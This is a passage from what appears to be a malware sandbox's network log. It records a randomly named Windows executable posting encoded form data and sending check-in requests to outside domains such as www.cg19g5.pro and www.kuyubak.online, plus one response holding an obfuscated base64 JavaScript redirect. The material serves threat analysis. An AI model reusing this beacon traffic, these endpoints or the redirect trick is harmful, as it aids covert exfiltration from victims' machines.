                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                    Dec 5, 2024 09:44:53.167243004 CET | 1236 | IN | Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                    Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                    Dec 5, 2024 09:44:53.167256117 CET | 1236 | IN | Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                    Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                    Dec 5, 2024 09:44:53.167423010 CET | 672 | IN | Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                    Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                    Dec 5, 2024 09:44:53.167434931 CET | 1236 | IN | Data Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                    Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                                    Dec 5, 2024 09:44:53.167452097 CET | 1236 | IN | Data Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                    Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                                    Dec 5, 2024 09:44:53.167464018 CET | 1236 | IN | Data Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                                    Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                                    Dec 5, 2024 09:44:53.167475939 CET | 1236 | IN | Data Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                                    Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                                    Dec 5, 2024 09:44:53.167737961 CET | 988 | IN | Data Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                                    Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    21 | 192.168.2.8 | 49730 | 154.88.22.105 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:44:58.952228069 CET | 771 | OUT | POST /n6mr/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.cg19g5.pro
                                                                    Origin: http://www.cg19g5.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.cg19g5.pro/n6mr/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 4c 4e 67 77 31 46 66 7a 39 56 77 47 6d 71 76 66 53 4a 6b 31 76 62 6b 74 2b 54 4d 62 43 70 49 4a 53 54 4c 33 31 6f 73 38 37 34 6d 76 57 4d 67 4f 2b 65 67 77 59 51 4a 41 70 57 69 6f 37 4f 55 41 35 61 37 55 4d 53 52 44 43 47 78 67 63 62 62 75 63 76 36 59 66 4e 4e 52 64 32 44 48 43 73 65 74 35 42 52 67 72 35 6c 38 6c 62 32 75 4a 54 67 43 2b 2f 75 61 46 38 6a 30 43 79 46 4a 50 2b 7a 61 34 52 72 52 4a 4f 37 6f 32 52 6c 41 66 2b 46 57 41 77 6b 37 79 41 4d 55 2f 67 6f 62 45 63 63 6d 55 55 39 35 6b 44 46 46 4d 46 61 37 38 70 58 2b 4e 38 43 6f 77 66 59 64 65 51 35 54 77 66 79 68 4d 56 6a 79 4d 57 73 3d
                                                                    Data Ascii: dpy4vDKP=LNgw1Ffz9VwGmqvfSJk1vbkt+TMbCpIJSTL31os874mvWMgO+egwYQJApWio7OUA5a7UMSRDCGxgcbbucv6YfNNRd2DHCset5BRgr5l8lb2uJTgC+/uaF8j0CyFJP+za4RrRJO7o2RlAf+FWAwk7yAMU/gobEccmUU95kDFFMFa78pX+N8CowfYdeQ5TwfyhMVjyMWs=
                                                                    Dec 5, 2024 09:45:00.463910103 CET | 364 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 91 59 5e 39 3e b9 7e 79 be e1 a6 65 7e c1 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 eb 98 84 8b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 67)N.,(ON,VPV/Ji%IAf>Y^9>~ye~f~Y&6PZ0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    22 | 192.168.2.8 | 49731 | 154.88.22.105 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:01.618776083 CET | 791 | OUT | POST /n6mr/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.cg19g5.pro
                                                                    Origin: http://www.cg19g5.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.cg19g5.pro/n6mr/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 4c 4e 67 77 31 46 66 7a 39 56 77 47 6e 4a 33 66 51 71 4d 31 70 37 6b 73 78 7a 4d 62 55 5a 49 4e 53 54 48 33 31 70 5a 68 37 71 43 76 59 4e 51 4f 77 37 4d 77 62 51 4a 41 68 32 69 74 34 2b 55 62 35 61 33 32 4d 58 78 44 43 48 52 67 63 62 4c 75 63 38 43 62 66 64 4e 54 56 57 44 4a 47 73 65 74 35 42 52 67 72 35 67 62 6c 62 2b 75 4a 67 34 43 2f 62 79 5a 4d 63 6a 72 4b 53 46 4a 4c 2b 7a 57 34 52 72 7a 4a 50 58 43 32 58 68 41 66 37 35 57 44 6a 38 34 34 41 4e 52 69 51 6f 50 50 64 68 65 55 45 59 43 75 44 6c 47 4b 32 2b 68 30 2f 6d 55 58 65 4b 75 7a 66 77 32 65 54 52 6c 31 6f 76 4a 57 32 7a 43 53 42 36 35 65 42 66 6e 48 6f 65 77 50 46 50 4c 48 73 71 30 68 46 56 4f
                                                                    Data Ascii: dpy4vDKP=LNgw1Ffz9VwGnJ3fQqM1p7ksxzMbUZINSTH31pZh7qCvYNQOw7MwbQJAh2it4+Ub5a32MXxDCHRgcbLuc8CbfdNTVWDJGset5BRgr5gblb+uJg4C/byZMcjrKSFJL+zW4RrzJPXC2XhAf75WDj844ANRiQoPPdheUEYCuDlGK2+h0/mUXeKuzfw2eTRl1ovJW2zCSB65eBfnHoewPFPLHsq0hFVO
                                                                    Dec 5, 2024 09:45:03.128293037 CET | 364 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 91 59 5e 39 3e b9 7e 79 be e1 a6 65 7e c1 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 eb 98 84 8b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 67)N.,(ON,VPV/Ji%IAf>Y^9>~ye~f~Y&6PZ0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    23 | 192.168.2.8 | 49732 | 154.88.22.105 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:04.325186014 CET | 1808 | OUT | POST /n6mr/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.cg19g5.pro
                                                                    Origin: http://www.cg19g5.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.cg19g5.pro/n6mr/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 4c 4e 67 77 31 46 66 7a 39 56 77 47 6e 4a 33 66 51 71 4d 31 70 37 6b 73 78 7a 4d 62 55 5a 49 4e 53 54 48 33 31 70 5a 68 37 71 4b 76 59 37 4d 4f 2f 34 30 77 61 51 4a 41 76 57 69 73 34 2b 56 4c 35 62 66 79 4d 58 73 30 43 44 68 67 4f 6f 54 75 4c 39 43 62 47 74 4e 54 4b 6d 44 49 43 73 66 33 35 46 31 73 72 35 77 62 6c 62 2b 75 4a 68 49 43 35 50 75 5a 4b 63 6a 30 43 79 46 37 50 2b 79 2f 34 52 6a 4a 4a 50 54 34 33 6e 42 41 52 37 4a 57 46 51 59 34 77 41 4e 66 6a 51 70 49 50 64 74 42 55 45 56 73 75 44 51 6a 4b 32 47 68 6b 35 44 31 43 50 71 74 68 76 34 37 62 41 56 64 2b 59 54 35 58 30 2f 46 59 67 53 34 66 41 76 4e 4a 49 43 6b 50 31 72 4f 61 4c 61 63 6e 51 6f 30 39 42 79 55 38 65 32 41 69 47 32 37 4a 48 73 71 61 66 79 4a 31 61 66 75 6e 51 61 47 79 7a 36 30 4d 52 65 51 35 37 33 6b 31 2b 51 57 6f 51 55 66 41 73 64 52 78 56 69 49 4e 72 74 61 55 46 53 34 76 69 4e 39 2b 5a 4d 76 55 30 79 6e 48 78 33 4c 79 70 44 6e 43 36 54 63 37 44 59 68 53 73 41 62 54 59 62 76 4b 61 6e 50 46 41 4e 73 4a [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP= [TRUNCATED]


                                                                    Session ID: 24 | Source IP: 192.168.2.8 | Source Port: 49733 | Destination IP: 154.88.22.105 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:06.998460054 CET | 515 | OUT | GET /n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.cg19g5.pro
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:08.518945932 CET | 332 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 69 59 6a 4a 6c 4c 6d 4e 6e 4d 57 35 76 4e 53 35 77 63 6d 38 36 4e 6a 59 34 4f 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9iYjJlLmNnMW5vNS5wcm86NjY4OQ=c=')</script>0


                                                                    Session ID: 25 | Source IP: 192.168.2.8 | Source Port: 49734 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:14.655365944 CET | 783 | OUT | POST /0y4f/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kuyubak.online
                                                                    Origin: http://www.kuyubak.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.kuyubak.online/0y4f/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 62 34 4c 58 47 53 33 69 6f 37 78 68 32 56 2f 31 6b 68 59 66 32 65 63 45 4e 4f 57 4d 39 61 52 62 72 6c 45 6e 68 46 78 36 53 6c 74 2b 49 43 6c 5a 71 6e 69 36 44 53 68 76 31 30 48 69 41 33 4c 61 57 38 70 71 61 76 2f 77 33 4c 75 34 69 45 46 62 43 6f 6e 37 31 41 4f 34 51 6d 33 53 48 73 72 76 38 65 70 4a 65 57 4a 52 31 67 62 69 43 52 6e 54 57 52 71 39 2f 6e 6b 42 70 7a 57 6a 43 47 4c 70 71 6d 50 55 41 52 72 44 34 41 46 7a 6d 74 30 6c 74 2b 54 42 74 72 7a 64 63 35 4c 30 73 46 72 43 32 54 6c 75 4f 6f 79 6f 43 44 38 58 73 5a 67 52 72 34 70 63 41 50 7a 44 42 4b 47 79 35 71 31 6a 39 39 55 45 55 66 49 3d
                                                                    Data Ascii: dpy4vDKP=b4LXGS3io7xh2V/1khYf2ecENOWM9aRbrlEnhFx6Slt+IClZqni6DShv10HiA3LaW8pqav/w3Lu4iEFbCon71AO4Qm3SHsrv8epJeWJR1gbiCRnTWRq9/nkBpzWjCGLpqmPUARrD4AFzmt0lt+TBtrzdc5L0sFrC2TluOoyoCD8XsZgRr4pcAPzDBKGy5q1j99UEUfI=


                                                                    Session ID: 26 | Source IP: 192.168.2.8 | Source Port: 49735 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:17.318989038 CET | 803 | OUT | POST /0y4f/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kuyubak.online
                                                                    Origin: http://www.kuyubak.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.kuyubak.online/0y4f/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 62 34 4c 58 47 53 33 69 6f 37 78 68 33 77 76 31 69 47 4d 66 78 2b 63 44 43 75 57 4d 6b 71 52 66 72 69 4d 6e 68 48 64 71 52 58 4a 2b 49 6a 56 5a 72 6d 69 36 54 43 68 76 74 6b 48 6e 4f 58 4c 42 57 38 6b 66 61 71 48 77 33 4c 36 34 69 42 35 62 43 37 66 34 31 51 4f 36 63 47 33 51 4e 4d 72 76 38 65 70 4a 65 53 5a 33 31 6a 72 69 44 67 33 54 58 7a 43 69 6a 33 6b 43 68 54 57 6a 47 47 4c 6c 71 6d 50 4d 41 51 32 57 34 43 39 7a 6d 73 45 6c 74 72 76 47 30 62 7a 62 53 5a 4b 49 6e 52 6d 61 38 7a 64 51 4b 4f 6d 56 43 68 30 49 67 50 52 37 78 61 68 61 44 50 62 6f 42 4a 75 45 38 64 6f 4c 6e 65 45 30 4b 49 63 45 6e 42 56 79 64 64 58 70 70 6d 65 37 70 74 63 42 76 4b 4b 72
                                                                    Data Ascii: dpy4vDKP=b4LXGS3io7xh3wv1iGMfx+cDCuWMkqRfriMnhHdqRXJ+IjVZrmi6TChvtkHnOXLBW8kfaqHw3L64iB5bC7f41QO6cG3QNMrv8epJeSZ31jriDg3TXzCij3kChTWjGGLlqmPMAQ2W4C9zmsEltrvG0bzbSZKInRma8zdQKOmVCh0IgPR7xahaDPboBJuE8doLneE0KIcEnBVyddXppme7ptcBvKKr


                                                                    Session ID: 27 | Source IP: 192.168.2.8 | Source Port: 49736 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:19.979989052 CET | 1820 | OUT | POST /0y4f/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kuyubak.online
                                                                    Origin: http://www.kuyubak.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.kuyubak.online/0y4f/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 62 34 4c 58 47 53 33 69 6f 37 78 68 33 77 76 31 69 47 4d 66 78 2b 63 44 43 75 57 4d 6b 71 52 66 72 69 4d 6e 68 48 64 71 52 58 42 2b 4a 52 74 5a 71 46 36 36 42 53 68 76 6c 45 48 63 4f 58 4b 42 57 38 4d 62 61 71 44 4f 33 4a 43 34 67 6b 31 62 56 61 66 34 36 51 4f 36 55 6d 33 52 48 73 71 72 38 59 4a 53 65 57 46 33 31 6a 72 69 44 69 66 54 51 68 71 69 68 33 6b 42 70 7a 57 76 43 47 4c 42 71 6d 58 32 41 51 7a 74 34 7a 64 7a 6c 4d 55 6c 2b 4e 37 47 72 72 7a 5a 48 5a 4b 51 6e 57 75 37 38 7a 78 63 4b 4f 36 37 43 69 55 49 6a 70 55 57 76 49 39 52 63 50 7a 43 50 37 43 78 34 74 30 59 36 59 45 65 41 70 51 38 6d 56 77 66 66 4f 62 62 67 57 6a 73 39 34 6b 79 6d 73 44 31 74 47 6c 56 36 38 63 6a 57 7a 39 43 57 31 67 58 2b 41 6c 6e 58 6b 61 32 30 54 44 43 52 36 53 57 45 6b 54 2b 65 72 4b 58 4c 39 67 70 71 57 4d 77 4c 36 53 6d 71 34 74 6e 6c 54 77 70 6f 46 63 6b 75 39 39 34 46 57 42 7a 7a 6c 76 61 6b 6a 54 39 43 4d 62 56 45 6c 52 46 69 6c 6b 62 4c 49 52 4b 78 43 30 33 72 42 30 43 4a 4b 72 65 64 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP= [TRUNCATED]


                                                                    Session ID: 28 | Source IP: 192.168.2.8 | Source Port: 49737 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:22.643873930 CET | 519 | OUT | GET /0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.kuyubak.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:23.959758997 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.14.1
                                                                    Date: Thu, 05 Dec 2024 08:45:23 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    X-Rate-Limit-Limit: 5s
                                                                    X-Rate-Limit-Remaining: 19
                                                                    X-Rate-Limit-Reset: 2024-12-05T08:45:28.7410353Z


                                                                    Session ID: 29 | Source IP: 192.168.2.8 | Source Port: 49738 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:29.832551956 CET | 795 | OUT | POST /9qaj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
